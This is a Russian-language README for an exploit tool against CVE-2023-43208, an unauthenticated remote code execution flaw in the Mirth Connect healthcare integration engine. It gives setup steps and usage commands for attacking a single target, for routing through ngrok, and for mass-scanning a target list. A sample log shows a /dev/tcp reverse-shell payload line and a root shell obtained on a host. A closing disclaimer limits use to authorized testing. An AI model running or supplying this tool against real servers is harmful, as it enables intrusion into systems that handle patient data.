
Эксплойт неаутентифицированного RCE для CVE-2023-43208 в Mirth Connect через XML-десериализацию, с определением версии, массовым сканированием и интерактивной PTY-оболочкой.
Эксплойт Proof-of-Concept для CVE-2023-43208 — уязвимости удаленного выполнения кода без аутентификации в Mirth Connect версий до
4.4.1.
Mirth Connect — широко используемый открытый движок интеграции здравоохранения. Данная уязвимость использует дефект десериализации Java через конечную точку /api/users с помощью специально сформированной XML-нагрузки, объединяющей гаджеты Apache Commons Collections, для достижения RCE без аутентификации. Улучшенная версия заменяет оригинальный прослушиватель pwncat на полностью независимую интерактивную PTY-оболочку, использующую только встроенные функции Python (socket, select, tty, termios). Оболочка автоматически обновляется до полноценного PTY при подключении.
| Программное обеспечение | Уязвимые версии | Исправленная версия |
|---|---|---|
| Mirth Connect | < 4.4.1 | 4.4.1+ |
python3/python/script)stty rows/cols)pwncat — только стандартная библиотека для прослушивателяgit clone https://github.com/yourrepo/CVE-2023-43208
cd CVE-2023-43208
pip install -r requirements.txt
requests
packaging
rich
alive-progress
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <PORT>
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <NGROK_PORT> -bp <LOCAL_PORT>
python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt
| Флаг | Описание |
|---|---|
-u, --url | URL цели |
-lh, --lhost | Ваш IP для прослушивания |
-lp, --lport | Ваш порт для прослушивания |
-bp, --bindport | Переопределение порта привязки (полезно с ngrok) |
-f, --file | Файл со списком целевых URL |
-o, --output | Сохранить уязвимые цели в файл |
-t, --threads | Количество потоков для сканирования (по умолчанию: 50) |
[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...
root@mirth:/#
Этот инструмент предназначен только для авторизованного тестирования на проникновение и образовательных целей.
Несанкционированное использование против систем, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения, незаконно.
Авторы не несут ответственности за любое неправомерное использование или ущерб, причиненный данным инструментом.